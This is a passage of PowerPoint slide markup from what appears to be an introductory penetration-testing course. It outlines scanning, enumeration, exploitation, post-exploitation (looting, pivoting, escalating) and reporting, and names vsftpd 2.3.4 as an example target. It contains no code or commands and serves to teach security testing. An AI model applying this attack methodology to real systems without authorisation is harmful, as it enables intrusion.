          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2596896" y="2286000"/>
            <a:ext cx="1417320" cy="640080"/>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Scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2596896" y="2962656"/>
            <a:ext cx="1417320" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Which hosts are up,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>which ports answer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4142232" y="2825496"/>
            <a:ext cx="155448" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="B174FB"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4315968" y="1664208"/>
            <a:ext cx="1691640" cy="2331720"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3784"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4480560" y="1828800"/>
            <a:ext cx="1371600" cy="384048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>03</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4480560" y="2286000"/>
            <a:ext cx="1417320" cy="640080"/>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Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4480560" y="2962656"/>
            <a:ext cx="1417320" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>What software,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>which version</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6025896" y="2825496"/>
            <a:ext cx="155448" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="B174FB"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6199632" y="1664208"/>
            <a:ext cx="1691640" cy="2331720"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3784"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6364224" y="1828800"/>
            <a:ext cx="1371600" cy="384048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>04</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6364224" y="2286000"/>
            <a:ext cx="1417320" cy="640080"/>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Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6364224" y="2962656"/>
            <a:ext cx="1417320" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Turn a version</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>into access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Shape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7909560" y="2825496"/>
            <a:ext cx="155448" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="B174FB"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Shape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8083296" y="1664208"/>
            <a:ext cx="1691640" cy="2331720"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3784"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8247888" y="1828800"/>
            <a:ext cx="1371600" cy="384048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>05</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8247888" y="2286000"/>
            <a:ext cx="1417320" cy="640080"/>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Post-exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8247888" y="2962656"/>
            <a:ext cx="1417320" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Loot, pivot,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>escalate</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Shape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9793224" y="2825496"/>
            <a:ext cx="155448" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="B174FB"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Shape 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9966960" y="1664208"/>
            <a:ext cx="1691640" cy="2331720"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3784"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10131552" y="1828800"/>
            <a:ext cx="1371600" cy="384048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>06</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10131552" y="2286000"/>
            <a:ext cx="1417320" cy="640080"/>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Reporting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10131552" y="2962656"/>
            <a:ext cx="1417320" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Findings, risk,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>remediation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9829800" y="3995928"/>
            <a:ext cx="0" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15240">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Shape 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="4453128"/>
            <a:ext cx="8458200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15240">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Shape 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3995928"/>
            <a:ext cx="0" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15240">
            <a:solidFill>
              <a:srgbClr val="B174FB"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Text 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="4526280"/>
            <a:ext cx="7315200" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>every new host, service or credential sends you back to step 02</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Text 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="5257800"/>
            <a:ext cx="11064240" cy="822960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2030"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Beginners jump straight from a port number to a public exploit and get nothing. The step that pays is enumeration: knowing that port 21 runs vsftpd 2.3.4 is worth more than knowing port 21 is open.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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01 / FOUNDATIONS</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IP addresses and ports, in plain language</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08</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1508760"/>
            <a:ext cx="5394960" cy="1965960"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3256"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="1737360"/>
            <a:ext cx="4846320" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>192.168.56.101</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="2286000"/>
            <a:ext cx="4846320" cy="822960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
